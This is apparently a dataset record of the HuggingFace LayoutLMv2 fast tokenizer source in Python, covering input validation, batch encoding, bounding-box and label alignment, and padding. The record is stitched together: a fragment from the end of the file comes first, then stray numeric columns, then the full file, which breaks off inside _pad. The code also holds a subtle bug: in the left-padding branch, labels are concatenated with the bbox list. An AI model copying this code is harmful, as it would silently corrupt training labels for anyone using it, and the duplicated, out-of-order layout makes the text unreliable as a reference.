padding=padding,
truncation=truncation,
max_length=max_length,
pad_to_multiple_of=pad_to_multiple_of,
verbose=verbose,
**kwargs,
)
return self._encode_plus(
text=text,
boxes=boxes,
text_pair=text_pair,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding_strategy=padding_strategy,
truncation_strategy=truncation_strategy,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
def _pad(
self,
encoded_inputs: Union[Dict[str, EncodedInput], BatchEncoding],
max_length: Optional[int] = None,
padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
pad_to_multiple_of: Optional[int] = None,
return_attention_mask: Optional[bool] = None,
) -> dict:
"""
Pad encoded inputs (on left/right and up to predefined length or max length in the batch)
Args:
encoded_inputs: Dictionary of tokenized inputs (`List[int]`) or batch of tokenized inputs (`List[List[int]]`).
max_length: maximum length of the returned list and optionally padding length (see below).
Will truncate by taking into account the special tokens.
padding_strategy: PaddingStrategy to use for padding.
- PaddingStrategy.LONGEST Pad to the longest sequence in the batch
- PaddingStrategy.MAX_LENGTH: Pad to the max length (default)
- PaddingStrategy.DO_NOT_PAD: Do not pad
The tokenizer padding sides are defined in self.padding_side:
- 'left': pads on the left of the sequences
- 'right': pads on the right of the sequences
pad_to_multiple_of: (optional) Integer if set will pad the sequence to a multiple of the provided value.
This is especially useful to enable the use of Tensor Core on NVIDIA hardware with compute capability
>= 7.5 (Volta).
return_attention_mask: (optional) Set to False to avoid returning attention mask (default: set to model specifics)
"""
# Load from model defaults
if return_attention_mask is None:
return_attention_mask = "attention_mask" in self.model_input_names
required_input = encoded_inputs[self.model_input_names[0]]
if padding_strategy == PaddingStrategy.LONGEST:
max_length = len(required_input)
if max_length is not None and pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):
max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of
needs_to_be_padded = padding_strategy != PaddingStrategy.DO_NOT_PAD and len(required_input) != max_length
# Initialize attention mask if not present.
if return_attention_mask and "attention_mask" not in encoded_inputs:
encoded_inputs["attention_mask"] = [1] * len(required_input)
if needs_to_be_padded:
difference = max_length - len(required_input)
if self.padding_side == "right":
if return_attention_mask:
encoded_inputs["attention_mask"] = encoded_inputs["attention_mask"] + [0] * difference
if "token_type_ids" in encoded_inputs:
encoded_inputs["token_type_ids"] = (
encoded_inputs["token_type_ids"] + [self.pad_token_type_id] * difference
)
if "bbox" in encoded_inputs:
encoded_inputs["bbox"] = encoded_inputs["bbox"] + [self.pad_token_box] * difference
if "labels" in encoded_inputs:
encoded_inputs["labels"] = encoded_inputs["labels"] + [self.pad_token_label] * difference
if "special_tokens_mask" in encoded_inputs:
encoded_inputs["special_tokens_mask"] = encoded_inputs["special_tokens_mask"] + [1] * difference
encoded_inputs[self.model_input_names[0]] = required_input + [self.pad_token_id] * difference
elif self.padding_side == "left":
if return_attention_mask:
encoded_inputs["attention_mask"] = [0] * difference + encoded_inputs["attention_mask"]
if "token_type_ids" in encoded_inputs:
encoded_inputs["token_type_ids"] = [self.pad_token_type_id] * difference + encoded_inputs[
"token_type_ids"
]
if "bbox" in encoded_inputs:
encoded_inputs["bbox"] = [self.pad_token_box] * difference + encoded_inputs["bbox"]
if "labels" in encoded_inputs:
encoded_inputs["labels"] = [self.pad_token_label] * difference + encoded_inputs["bbox"]
if "special_tokens_mask" in encoded_inputs:
encoded_inputs["special_tokens_mask"] = [1] * difference + encoded_inputs["special_tokens_mask"]
encoded_inputs[self.model_input_names[0]] = [self.pad_token_id] * difference + required_input
else:
raise ValueError("Invalid padding strategy:" + str(self.padding_side))
return encoded_inputs
def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None):
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. A BERT sequence has the following format:
- single sequence: ``[CLS] X [SEP]``
- pair of sequences: ``[CLS] A [SEP] B [SEP]``
Args:
token_ids_0 (:obj:`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (:obj:`List[int]`, `optional`):
Optional second list of IDs for sequence pairs.
Returns:
:obj:`List[int]`: List of `input IDs <../glossary.html#input-ids>`__ with the appropriate special tokens.
"""
output = [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
if token_ids_1:
output += token_ids_1 + [self.sep_token_id]
return output
def create_token_type_ids_from_sequences(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Create a mask from the two sequences passed to be used in a sequence-pair classification task. A BERT sequence
pair mask has the following format: :: 0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 | first sequence | second
sequence | If :obj:`token_ids_1` is :obj:`None`, this method only returns the first portion of the mask (0s).
Args:
token_ids_0 (:obj:`List[int]`):
List of IDs.
token_ids_1 (:obj:`List[int]`, `optional`):
Optional second list of IDs for sequence pairs.
Returns:
:obj:`List[int]`: List of `token type IDs <../glossary.html#token-type-ids>`_ according to the given
sequence(s).
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep) * [0] + len(token_ids_1 + sep) * [1]
| 47.174289 | 132 | 0.626742 | # coding=utf-8
# Copyright 2021 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fast tokenization class for LayoutLMv2. It overwrites 2 methods of the slow tokenizer class, namely _batch_encode_plus
and _encode_plus, in which the Rust tokenizer is used.
"""
import json
from typing import Dict, List, Optional, Tuple, Union
from tokenizers import normalizers
from ...file_utils import PaddingStrategy, TensorType, add_end_docstrings
from ...tokenization_utils_base import (
ENCODE_KWARGS_DOCSTRING,
BatchEncoding,
EncodedInput,
PreTokenizedInput,
TextInput,
TextInputPair,
TruncationStrategy,
)
from ...tokenization_utils_fast import PreTrainedTokenizerFast
from ...utils import logging
from .tokenization_layoutlmv2 import LAYOUTLMV2_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING, LayoutLMv2Tokenizer
logger = logging.get_logger(__name__)
VOCAB_FILES_NAMES = {"vocab_file": "vocab.txt", "tokenizer_file": "tokenizer.json"}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"microsoft/layoutlmv2-base-uncased": "https://huggingface.co/microsoft/layoutlmv2-base-uncased/resolve/main/vocab.txt",
},
"tokenizer_file": {
"microsoft/layoutlmv2-base-uncased": "https://huggingface.co/microsoft/layoutlmv2-base-uncased/resolve/main/tokenizer.json",
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"microsoft/layoutlmv2-base-uncased": 512,
}
PRETRAINED_INIT_CONFIGURATION = {
"microsoft/layoutlmv2-base-uncased": {"do_lower_case": True},
}
class LayoutLMv2TokenizerFast(PreTrainedTokenizerFast):
r"""
Construct a "fast" LayoutLMv2 tokenizer (backed by HuggingFace's `tokenizers` library). Based on WordPiece.
This tokenizer inherits from :class:`~transformers.PreTrainedTokenizerFast` which contains most of the main
methods. Users should refer to this superclass for more information regarding those methods.
Args:
vocab_file (:obj:`str`):
File containing the vocabulary.
do_lower_case (:obj:`bool`, `optional`, defaults to :obj:`True`):
Whether or not to lowercase the input when tokenizing.
unk_token (:obj:`str`, `optional`, defaults to :obj:`"[UNK]"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
sep_token (:obj:`str`, `optional`, defaults to :obj:`"[SEP]"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
pad_token (:obj:`str`, `optional`, defaults to :obj:`"[PAD]"`):
The token used for padding, for example when batching sequences of different lengths.
cls_token (:obj:`str`, `optional`, defaults to :obj:`"[CLS]"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
mask_token (:obj:`str`, `optional`, defaults to :obj:`"[MASK]"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
cls_token_box (:obj:`List[int]`, `optional`, defaults to :obj:`[0, 0, 0, 0]`):
The bounding box to use for the special [CLS] token.
sep_token_box (:obj:`List[int]`, `optional`, defaults to :obj:`[1000, 1000, 1000, 1000]`):
The bounding box to use for the special [SEP] token.
pad_token_box (:obj:`List[int]`, `optional`, defaults to :obj:`[0, 0, 0, 0]`):
The bounding box to use for the special [PAD] token.
pad_token_label (:obj:`int`, `optional`, defaults to -100):
The label to use for padding tokens. Defaults to -100, which is the :obj:`ignore_index` of PyTorch's
CrossEntropyLoss.
only_label_first_subword (:obj:`bool`, `optional`, defaults to :obj:`True`):
Whether or not to only label the first subword, in case word labels are provided.
tokenize_chinese_chars (:obj:`bool`, `optional`, defaults to :obj:`True`):
Whether or not to tokenize Chinese characters. This should likely be deactivated for Japanese (see `this
issue <https://github.com/huggingface/transformers/issues/328>`__).
strip_accents: (:obj:`bool`, `optional`):
Whether or not to strip all accents. If this option is not specified, then it will be determined by the
value for :obj:`lowercase` (as in the original LayoutLMv2).
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
slow_tokenizer_class = LayoutLMv2Tokenizer
def __init__(
self,
vocab_file=None,
tokenizer_file=None,
do_lower_case=True,
unk_token="[UNK]",
sep_token="[SEP]",
pad_token="[PAD]",
cls_token="[CLS]",
mask_token="[MASK]",
cls_token_box=[0, 0, 0, 0],
sep_token_box=[1000, 1000, 1000, 1000],
pad_token_box=[0, 0, 0, 0],
pad_token_label=-100,
only_label_first_subword=True,
tokenize_chinese_chars=True,
strip_accents=None,
**kwargs
):
super().__init__(
vocab_file,
tokenizer_file=tokenizer_file,
do_lower_case=do_lower_case,
unk_token=unk_token,
sep_token=sep_token,
pad_token=pad_token,
cls_token=cls_token,
mask_token=mask_token,
cls_token_box=cls_token_box,
sep_token_box=sep_token_box,
pad_token_box=pad_token_box,
pad_token_label=pad_token_label,
only_label_first_subword=only_label_first_subword,
tokenize_chinese_chars=tokenize_chinese_chars,
strip_accents=strip_accents,
**kwargs,
)
pre_tok_state = json.loads(self.backend_tokenizer.normalizer.__getstate__())
if (
pre_tok_state.get("lowercase", do_lower_case) != do_lower_case
or pre_tok_state.get("strip_accents", strip_accents) != strip_accents
):
pre_tok_class = getattr(normalizers, pre_tok_state.pop("type"))
pre_tok_state["lowercase"] = do_lower_case
pre_tok_state["strip_accents"] = strip_accents
self.backend_tokenizer.normalizer = pre_tok_class(**pre_tok_state)
self.do_lower_case = do_lower_case
# additional properties
self.cls_token_box = cls_token_box
self.sep_token_box = sep_token_box
self.pad_token_box = pad_token_box
self.pad_token_label = pad_token_label
self.only_label_first_subword = only_label_first_subword
@add_end_docstrings(ENCODE_KWARGS_DOCSTRING, LAYOUTLMV2_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
def __call__(
self,
text: Union[TextInput, PreTokenizedInput, List[TextInput], List[PreTokenizedInput]],
text_pair: Optional[Union[PreTokenizedInput, List[PreTokenizedInput]]] = None,
boxes: Union[List[List[int]], List[List[List[int]]]] = None,
word_labels: Optional[Union[List[int], List[List[int]]]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = False,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs
) -> BatchEncoding:
"""
Main method to tokenize and prepare for the model one or several sequence(s) or one or several pair(s) of
sequences with word-level normalized bounding boxes and optional labels.
Args:
text (:obj:`str`, :obj:`List[str]`, :obj:`List[List[str]]`):
The sequence or batch of sequences to be encoded. Each sequence can be a string, a list of strings
(words of a single example or questions of a batch of examples) or a list of list of strings (batch of
words).
text_pair (:obj:`List[str]`, :obj:`List[List[str]]`):
The sequence or batch of sequences to be encoded. Each sequence should be a list of strings
(pretokenized string).
boxes (:obj:`List[List[int]]`, :obj:`List[List[List[int]]]`):
Word-level bounding boxes. Each bounding box should be normalized to be on a 0-1000 scale.
word_labels (:obj:`List[int]`, :obj:`List[List[int]]`, `optional`):
Word-level integer labels (for token classification tasks such as FUNSD, CORD).
"""
# Input type checking for clearer error
def _is_valid_text_input(t):
if isinstance(t, str):
# Strings are fine
return True
elif isinstance(t, (list, tuple)):
# List are fine as long as they are...
if len(t) == 0:
# ... empty
return True
elif isinstance(t[0], str):
# ... list of strings
return True
elif isinstance(t[0], (list, tuple)):
# ... list with an empty list or with a list of strings
return len(t[0]) == 0 or isinstance(t[0][0], str)
else:
return False
else:
return False
if text_pair is not None:
# in case text + text_pair are provided, text = questions, text_pair = words
if not _is_valid_text_input(text):
raise ValueError("text input must of type `str` (single example) or `List[str]` (batch of examples). ")
if not isinstance(text_pair, (list, tuple)):
raise ValueError(
"Words must be of type `List[str]` (single pretokenized example), "
"or `List[List[str]]` (batch of pretokenized examples)."
)
else:
# in case only text is provided => must be words
if not isinstance(text, (list, tuple)):
raise ValueError(
"Words must be of type `List[str]` (single pretokenized example), "
"or `List[List[str]]` (batch of pretokenized examples)."
)
if text_pair is not None:
is_batched = isinstance(text, (list, tuple))
else:
is_batched = isinstance(text, (list, tuple)) and text and isinstance(text[0], (list, tuple))
words = text if text_pair is None else text_pair
assert boxes is not None, "You must provide corresponding bounding boxes"
if is_batched:
assert len(words) == len(boxes), "You must provide words and boxes for an equal amount of examples"
for words_example, boxes_example in zip(words, boxes):
assert len(words_example) == len(
boxes_example
), "You must provide as many words as there are bounding boxes"
else:
assert len(words) == len(boxes), "You must provide as many words as there are bounding boxes"
if is_batched:
if text_pair is not None and len(text) != len(text_pair):
raise ValueError(
f"batch length of `text`: {len(text)} does not match batch length of `text_pair`: {len(text_pair)}."
)
batch_text_or_text_pairs = list(zip(text, text_pair)) if text_pair is not None else text
is_pair = bool(text_pair is not None)
return self.batch_encode_plus(
batch_text_or_text_pairs=batch_text_or_text_pairs,
is_pair=is_pair,
boxes=boxes,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding=padding,
truncation=truncation,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
else:
return self.encode_plus(
text=text,
text_pair=text_pair,
boxes=boxes,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding=padding,
truncation=truncation,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
@add_end_docstrings(ENCODE_KWARGS_DOCSTRING, LAYOUTLMV2_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
def batch_encode_plus(
self,
batch_text_or_text_pairs: Union[
List[TextInput],
List[TextInputPair],
List[PreTokenizedInput],
],
is_pair: bool = None,
boxes: Optional[List[List[List[int]]]] = None,
word_labels: Optional[Union[List[int], List[List[int]]]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = False,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs
) -> BatchEncoding:
""" """
# Backward compatibility for 'truncation_strategy', 'pad_to_max_length'
padding_strategy, truncation_strategy, max_length, kwargs = self._get_padding_truncation_strategies(
padding=padding,
truncation=truncation,
max_length=max_length,
pad_to_multiple_of=pad_to_multiple_of,
verbose=verbose,
**kwargs,
)
return self._batch_encode_plus(
batch_text_or_text_pairs=batch_text_or_text_pairs,
is_pair=is_pair,
boxes=boxes,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding_strategy=padding_strategy,
truncation_strategy=truncation_strategy,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
def tokenize(self, text: str, pair: Optional[str] = None, add_special_tokens: bool = False, **kwargs) -> List[str]:
batched_input = [(text, pair)] if pair else [text]
encodings = self._tokenizer.encode_batch(
batched_input, add_special_tokens=add_special_tokens, is_pretokenized=False, **kwargs
)
return encodings[0].tokens
@add_end_docstrings(ENCODE_KWARGS_DOCSTRING, LAYOUTLMV2_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
def encode_plus(
self,
text: Union[TextInput, PreTokenizedInput],
text_pair: Optional[PreTokenizedInput] = None,
boxes: Optional[List[List[int]]] = None,
word_labels: Optional[List[int]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = False,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs
) -> BatchEncoding:
"""
Tokenize and prepare for the model a sequence or a pair of sequences. .. warning:: This method is deprecated,
``__call__`` should be used instead.
Args:
text (:obj:`str`, :obj:`List[str]`, :obj:`List[List[str]]`):
The first sequence to be encoded. This can be a string, a list of strings or a list of list of strings.
text_pair (:obj:`List[str]` or :obj:`List[int]`, `optional`):
Optional second sequence to be encoded. This can be a list of strings (words of a single example) or a
list of list of strings (words of a batch of examples).
"""
# Backward compatibility for 'truncation_strategy', 'pad_to_max_length'
padding_strategy, truncation_strategy, max_length, kwargs = self._get_padding_truncation_strategies(
padding=padding,
truncation=truncation,
max_length=max_length,
pad_to_multiple_of=pad_to_multiple_of,
verbose=verbose,
**kwargs,
)
return self._encode_plus(
text=text,
boxes=boxes,
text_pair=text_pair,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding_strategy=padding_strategy,
truncation_strategy=truncation_strategy,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
def _batch_encode_plus(
self,
batch_text_or_text_pairs: Union[
List[TextInput],
List[TextInputPair],
List[PreTokenizedInput],
],
is_pair: bool = None,
boxes: Optional[List[List[List[int]]]] = None,
word_labels: Optional[List[List[int]]] = None,
add_special_tokens: bool = True,
padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
truncation_strategy: TruncationStrategy = TruncationStrategy.DO_NOT_TRUNCATE,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[str] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
) -> BatchEncoding:
if not isinstance(batch_text_or_text_pairs, list):
raise TypeError(f"batch_text_or_text_pairs has to be a list (got {type(batch_text_or_text_pairs)})")
# Set the truncation and padding strategy and restore the initial configuration
self.set_truncation_and_padding(
padding_strategy=padding_strategy,
truncation_strategy=truncation_strategy,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
)
if is_pair:
batch_text_or_text_pairs = [(text.split(), text_pair) for text, text_pair in batch_text_or_text_pairs]
encodings = self._tokenizer.encode_batch(
batch_text_or_text_pairs,
add_special_tokens=add_special_tokens,
is_pretokenized=True, # we set this to True as LayoutLMv2 always expects pretokenized inputs
)
# Convert encoding to dict
# `Tokens` has type: Tuple[
# List[Dict[str, List[List[int]]]] or List[Dict[str, 2D-Tensor]],
# List[EncodingFast]
# ]
# with nested dimensions corresponding to batch, overflows, sequence length
tokens_and_encodings = [
self._convert_encoding(
encoding=encoding,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=True
if word_labels is not None
else return_offsets_mapping, # we use offsets to create the labels
return_length=return_length,
verbose=verbose,
)
for encoding in encodings
]
# Convert the output to have dict[list] from list[dict] and remove the additional overflows dimension
# From (variable) shape (batch, overflows, sequence length) to ~ (batch * overflows, sequence length)
# (we say ~ because the number of overflow varies with the example in the batch)
#
# To match each overflowing sample with the original sample in the batch
# we add an overflow_to_sample_mapping array (see below)
sanitized_tokens = {}
for key in tokens_and_encodings[0][0].keys():
stack = [e for item, _ in tokens_and_encodings for e in item[key]]
sanitized_tokens[key] = stack
sanitized_encodings = [e for _, item in tokens_and_encodings for e in item]
# If returning overflowing tokens, we need to return a mapping
# from the batch idx to the original sample
if return_overflowing_tokens:
overflow_to_sample_mapping = []
for i, (toks, _) in enumerate(tokens_and_encodings):
overflow_to_sample_mapping += [i] * len(toks["input_ids"])
sanitized_tokens["overflow_to_sample_mapping"] = overflow_to_sample_mapping
for input_ids in sanitized_tokens["input_ids"]:
self._eventual_warn_about_too_long_sequence(input_ids, max_length, verbose)
# create the token boxes
token_boxes = []
for batch_index in range(len(sanitized_tokens["input_ids"])):
if return_overflowing_tokens:
original_index = sanitized_tokens["overflow_to_sample_mapping"][batch_index]
else:
original_index = batch_index
token_boxes_example = []
for id, sequence_id, word_id in zip(
sanitized_tokens["input_ids"][batch_index],
sanitized_encodings[batch_index].sequence_ids,
sanitized_encodings[batch_index].word_ids,
):
if word_id is not None:
if is_pair and sequence_id == 0:
token_boxes_example.append(self.pad_token_box)
else:
token_boxes_example.append(boxes[original_index][word_id])
else:
if id == self.cls_token_id:
token_boxes_example.append(self.cls_token_box)
elif id == self.sep_token_id:
token_boxes_example.append(self.sep_token_box)
elif id == self.pad_token_id:
token_boxes_example.append(self.pad_token_box)
else:
raise ValueError("Id not recognized")
token_boxes.append(token_boxes_example)
sanitized_tokens["bbox"] = token_boxes
# optionally, create the labels
if word_labels is not None:
labels = []
for batch_index in range(len(sanitized_tokens["input_ids"])):
if return_overflowing_tokens:
original_index = sanitized_tokens["overflow_to_sample_mapping"][batch_index]
else:
original_index = batch_index
labels_example = []
for id, offset, word_id in zip(
sanitized_tokens["input_ids"][batch_index],
sanitized_tokens["offset_mapping"][batch_index],
sanitized_encodings[batch_index].word_ids,
):
if word_id is not None:
if self.only_label_first_subword:
if offset[0] == 0:
# Use the real label id for the first token of the word, and padding ids for the remaining tokens
labels_example.append(word_labels[original_index][word_id])
else:
labels_example.append(self.pad_token_label)
else:
labels_example.append(word_labels[original_index][word_id])
else:
labels_example.append(self.pad_token_label)
labels.append(labels_example)
sanitized_tokens["labels"] = labels
# finally, remove offsets if the user didn't want them
if not return_offsets_mapping:
del sanitized_tokens["offset_mapping"]
return BatchEncoding(sanitized_tokens, sanitized_encodings, tensor_type=return_tensors)
def _encode_plus(
self,
text: Union[TextInput, PreTokenizedInput],
text_pair: Optional[PreTokenizedInput] = None,
boxes: Optional[List[List[int]]] = None,
word_labels: Optional[List[int]] = None,
add_special_tokens: bool = True,
padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
truncation_strategy: TruncationStrategy = TruncationStrategy.DO_NOT_TRUNCATE,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[bool] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs
) -> BatchEncoding:
# make it a batched input
# 2 options:
# 1) only text, in case text must be a list of str
# 2) text + text_pair, in which case text = str and text_pair a list of str
batched_input = [(text, text_pair)] if text_pair else [text]
batched_boxes = [boxes]
batched_word_labels = [word_labels] if word_labels is not None else None
batched_output = self._batch_encode_plus(
batched_input,
is_pair=bool(text_pair is not None),
boxes=batched_boxes,
word_labels=batched_word_labels,
add_special_tokens=add_special_tokens,
padding_strategy=padding_strategy,
truncation_strategy=truncation_strategy,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
# Return tensor is None, then we can remove the leading batch axis
# Overflowing tokens are returned as a batch of output so we keep them in this case
if return_tensors is None and not return_overflowing_tokens:
batched_output = BatchEncoding(
{
key: value[0] if len(value) > 0 and isinstance(value[0], list) else value
for key, value in batched_output.items()
},
batched_output.encodings,
)
self._eventual_warn_about_too_long_sequence(batched_output["input_ids"], max_length, verbose)
return batched_output
def _pad(
self,
encoded_inputs: Union[Dict[str, EncodedInput], BatchEncoding],
max_length: Optional[int] = None,
padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
pad_to_multiple_of: Optional[int] = None,
return_attention_mask: Optional[bool] = None,
) -> dict:
"""
Pad encoded inputs (on left/right and up to predefined length or max length in the batch)
Args:
encoded_inputs: Dictionary of tokenized inputs (`List[int]`) or batch of tokenized inputs (`List[List[int]]`).
max_length: maximum length of the returned list and optionally padding length (see below).
Will truncate by taking into account the special tokens.
padding_strategy: PaddingStrategy to use for padding.
- PaddingStrategy.LONGEST Pad to the longest sequence in the batch
- PaddingStrategy.MAX_LENGTH: Pad to the max length (default)
- PaddingStrategy.DO_NOT_PAD: Do not pad
The tokenizer padding sides are defined in self.padding_side:
- 'left': pads on the left of the sequences
- 'right': pads on the right of the sequences
pad_to_multiple_of: (optional) Integer if set will pad the sequence to a multiple of the provided value.
This is especially useful to enable the use of Tensor Core on NVIDIA hardware with compute capability
>= 7.5 (Volta).
return_attention_mask: (optional) Set to False to avoid returning attention mask (default: set to model specifics)
"""
# Load from model defaults
if return_attention_mask is None:
return_attention_mask = "attention_mask" in self.model_input_names
required_input = encoded_inputs[self.model_input_names[0]]
if padding_strategy == PaddingStrategy.LONGEST:
max_length = len(required_input)
if max_length is not None and pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):
max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of
needs_to_be_padded = padding_strategy != PaddingStrategy.DO_NOT_PAD and len(required_input) != max_length
# Initialize attention mask if not present.
if return_attention_mask and "attention_mask" not in encoded_inputs:
encoded_inputs["attention_mask"] = [1] * len(required_input)
if needs_to_be_padded:
difference = max_length - len(required_input)
if self.padding_side == "right":
if return_attention_mask:
encoded_inputs["attention_mask"] = encoded_inputs["attention_mask"] + [0] * difference
if "token_type_ids" in encoded_inputs:
encoded_inputs["token_type_ids"] = (
encoded_inputs["token_type_ids"] + [self.pad_token_type_id] * difference
)
if "bbox" in encoded_inputs:
encoded_inputs["bbox"] = encoded_inputs["bbox"] + [self.pad_token_box] * difference
if "labels" in encoded_inputs:
encoded_inputs["labels"] = encoded_inputs["labels"] + [self.pad_token_label] * difference
if "special_tokens_mask" in encoded_inputs:
encoded_inputs["special_tokens_mask"] = encoded_inputs["special_tokens_mask"] + [1] * difference
encoded_inputs[self.model_input_names[0]] = required_input + [self.pad_token_id] * difference
elif self.padding_side == "left":
if return_attention_mask:
encoded_inputs["attention_mask"] = [0] * difference + encoded_inputs["attention_mask"]
if "token_type_ids" in encoded_inputs:
encoded_inputs["token_type_ids"] = [self.pad_token_type_id] * difference + encoded_inputs[
"token_type_ids"
]
if "bbox" in encoded_inputs:
encoded_inputs["bbox"] = [self.pad_token_box] * difference + encoded_inputs["bbox"]
if "labels" in encoded_inputs:
encoded_inputs["labels"] = [self.pad_token_label] * difference + encoded_inputs["bbox"]
if "special_tokens_mask" in encoded_inputs:
